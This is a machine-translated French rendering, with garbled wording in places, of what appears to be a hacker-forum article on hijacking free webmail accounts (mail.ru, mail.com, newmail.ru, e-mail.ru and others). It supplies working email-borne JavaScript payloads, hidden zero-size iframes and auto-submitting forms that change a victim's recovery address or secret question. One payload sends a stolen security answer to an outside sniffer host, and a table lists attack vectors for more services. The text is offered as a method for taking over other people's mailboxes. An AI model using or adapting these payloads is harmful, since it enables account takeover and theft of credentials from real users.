This page has been robot translated, sorry for typos if any. Original content here.

EXAMEN DE VULNÉRABILITÉ DES SERVICES DE COURRIER POSTAL GRATUIT

Nous continuons à faire du courrier électronique. J'ai fait quelques recherches sur différents services de piratage et je vous présente les résultats. La technologie de l'attaque reste la même: une lettre avec un code JavaScript est envoyée à l'adresse de quelqu'un d'autre, qui est déclenchée lorsque le message est ouvert, et modifie toute information dans les paramètres de la boîte utilisateur. Cela n'a aucun sens de décrire chaque serveur en détail, car l'approche est la même partout, donc je vais donner quelques exemples, et à la fin - un tableau. Dans la plupart des cas, le piratage peut être considéré à 100%, avec certaines hypothèses: l'utilisateur doit utiliser l'interface Web pour lire des lettres, lors de l'écriture d'exploits, j'étais guidé par une plate-forme standard, c'est-à-dire que je suppose initialement que l'utilisateur n'a pas de système d'exploitation exotique ou Navigateur avec exécution JS désactivée.

WWW.MAIL.RU

Je vais commencer par le courrier numéro 1 en Russie. Pour le moment, grâce au saut de JavaScript et à une erreur des développeurs, cette boîte peut être piratée. Je pense que les principes de base sont bien connus. Comment obtenir un mot de passe? 1 - modification non autorisée de celui-ci. Échoue, vous devez connaître la version précédemment installée. 2 - changez la question secrète et utilisez le service de contrôle de l'amnésie. Ça ne marchera pas non plus. 3 - définissez votre e-mail alternatif pour recevoir un nouveau mot de passe généré par le système. Cela ne fonctionnera pas, les deux dernières des options ci-dessus sont sous la même forme et sont également protégées par mot de passe. Même les autres paramètres qui nous intéressent moins (nom, prénom, etc.) ne pourront plus être modifiés sans entrer le mot de passe actuel. Il semblerait qu'il n'y ait pas d'options. Cependant, il existe une telle section secondaire et discrète des paramètres "Informations de contact" (ICQ, site Web, téléphone, lieu de travail, fuseau horaire, etc.). Vous pouvez également spécifier un e-mail de contact dans cette section. L'astuce est que dans ce cas, l'adresse alternative dans les informations d'enregistrement change mais celle qui est écrite dans le questionnaire, et maintenant vous pouvez obtenir le mot de passe pour le savon en utilisant le service de rappel. Tout est simple. URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru Cependant, en utilisant la méthode GET, les paramètres ne peuvent plus être modifiés dans la boîte aux lettres mail.ru, je vais donc décrire en détail l'aspect technique du problème.

I. Nous envoyons une lettre avec un code à la boîte aux lettres souhaitée, qui générera un cadre directement dans le corps du message avec un lien vers notre site Web. Si possible, le script doit être déclenché sans aucune intervention de l'utilisateur (clic, clic, survol, chargement d'image, etc.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.yourdomain.ru/yourscript.html> </iframe>'; this.wav">>
 <p id = 'xxx'>
Afin d'assurer pleinement les performances du script, ainsi que le masquage, nous transformons:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.ru/yourscript.html width = 0 height = 0> </iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
En tant que tels, les codes de caractères remplacent les lettres au nom des éléments javascript et iframe, et le script de messagerie ne les filtre pas. État de la ligne = emplacement; crée la visibilité de l'URL locale dans la barre d'état afin que le scintillement superflu ne provoque pas de suspicion. Les attributs de largeur et de hauteur du cadre et de l'intégration sont définis sur zéro et les rendent invisibles.

II. Sur la ressource http://votresite.ru, nous avons un document HTML avec le formulaire pour envoyer les données modifiées au serveur mail.ru.

Le contenu de yourscript.html:
 <form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "Email" value = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Save" name = "Save"> <br>
 </form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </script>
Remarques: Je garantis le bon fonctionnement de la partie client du script uniquement pour IE; le formulaire d'envoi est affiché sur un site séparé spécifiquement pour "décharger" la lettre.


WWW.MAIL.COM

Maintenant, une erreur de sécurité légèrement différente, par exemple http://mail.com. Si vous utilisez le service de rappel de mot de passe, pour l'obtenir, entrez simplement la bonne réponse à la question de sécurité (l'une des options). Nous nous sommes donc fixés pour tâche d'obtenir cette réponse. Cela se fait facilement. Lorsque je suis entré dans les propriétés de la boîte aux lettres et regardé les informations d'enregistrement, j'ai vu que la réponse à la question secrète n'était pas cachée, ce qui nous permet de lire sa valeur en utilisant JavaScript.

Nous implémentons le script via la balise style .
Adresse de la page des paramètres: http://mail01.mail.com/scripts/common/genprofile.cgi
Nom du formulaire: profileform
Nom du champ de texte secret hint_a
Par conséquent, pour voler la question secrète, vous devez appeler la page des paramètres, exécuter JavaScript, obtenir la valeur document.profileform.hint_a.value et la transmettre au renifleur avec la variable d'environnement REQUEST_UR I.

Option prête:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'zero'% 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = path + str`> </iframe>" ); </style>
 <span id = 'out'> </span>
Dans le cadre généré avec le nom zéro, la page des paramètres est chargée. À la fin du téléchargement, le gestionnaire OnLoad lance un script pour lire la question secrète, puis, à travers le même cadre, envoie une réponse au renifleur. Allez maintenant sur http://zero.h12.ru/stat/log.php et trouvez les informations nécessaires dans la ligne "Host" .

WWW.NEWMAIL.RU

À mon avis, un mailer assez populaire, donc je vais vous en parler en détail. De plus, il est beaucoup plus facile de mettre la main sur le compte de quelqu'un d'autre qu'il n'y paraît à première vue. Vous pouvez le faire: envoyer un e-mail avec un script qui recevra un identifiant de session au démarrage, générer les demandes nécessaires et modifier les valeurs de l'e-mail alternatif (auquel le mot de passe sera envoyé plus tard) et la question et la réponse secrètes. Cependant, si vous spécifiez une autre adresse lors du rappel, le mot de passe lui sera envoyé, si seule la réponse secrète était correcte. Et l'observation suivante: l' identifiant de session pour modifier les paramètres ne peut PAS être utilisé du tout. De plus, toutes les balises sont autorisées. Tout ce qui précède réduit la quantité de code à quelques lignes:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = RÉPONSE largeur = 0 hauteur = 0> </iframe> 

WWW.E-MAIL.RU

La méthode de piratage e-mail.ru ne correspond pas quelque peu au sujet général de l'article, mais néanmoins - mail :) . Quand j'ai eu besoin d'obtenir le mot de passe d'une boîte, comme d'habitude, j'ai enregistré un compte et j'ai commencé à rechercher le système. La première chose qui a attiré mon attention était la possibilité de définir un nouveau mot de passe et une question secrète avec la réponse, sans entrer l'ancien mot de passe. Le plan d'action est ordinaire: vérifiez le filtrage des balises, obtenez l'ID et exécutez la demande. Cependant, pour modifier les paramètres, une variable utoken spéciale a été utilisée, qui est contenue dans le corps du document. Après avoir expérimenté la modification de la question et de la réponse avec l'utoken précédemment connu:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ QUESTION & panswer = http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Je suis venu à Je conclus que l' identification et les cookies ne sont pas nécessaires pour modifier les paramètres. Dans le même temps, après avoir observé utoken, il a été constaté que le nombre hexadécimal à quatre chiffres après l'adresse e-mail e-mail.ru-mail.ru-5a00 se situe dans une plage très étroite. À savoir, afin d'établir une question secrète avec une réponse sur n'importe quelle case qui nous intéresse, vous devez trier seulement 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . Lorsque le nombre sera deviné, nous entrerons dans la bonne case.

Remarques: certains changements sont survenus en ce moment. Le service de récupération de mot de passe ne fonctionne pas, il est donc conseillé de le changer immédiatement. L'adresse de changement de paramètre a également changé:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ La méthode ne fonctionne pas toujours. Probablement, tout de même, il est nécessaire que l'utilisateur se connecte occasionnellement via le Web .

Tableau avec les caractéristiques des serveurs WWW gratuits

SERVEUR Javascript VULNÉRABILITÉ
www.km.ru
km.ru
img src = javascript: Vous permet de lire le mot de passe de la page des paramètres dans le champ du mot de passe
www.mail.ru
mailbox.ru , bk.ru , list.ru ,
incorporer src = javascript: L'email alternatif peut être changé
www.mail.com
email.com , post.com , yourself.com , consultant.com , etc.
@ import url (javascript :); Les paramètres affichent la réponse à la question de sécurité
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
De toute façon Lisez / modifiez la question et la réponse. Mot de passe délivré valide
www.netman.ru et www.mailgate.ru
le même expéditeur. environ 80 domaines
img src = javascript :, style = background: url (javascript :) Vous pouvez voler la réponse à votre question de sécurité, le cas échéant. Il est également possible de définir l'adresse de transfert (les copies ne sont pas enregistrées)
www.yandex.ru OnError, OnLoad Suppression du site * .narod.ru (JS n'est pas requis)
www.ukr.net incorporer src = javasc
ript: ce .wav>
Lisez la réponse à la question de sécurité.
www.nextmail.ru
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
incorporer src = "javascript: Modifier / voler la réponse à la question de sécurité
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru , etc.
À bien des égards Suppression de compte
www.rin.ru incorporer src = javascript: Lire la réponse secrète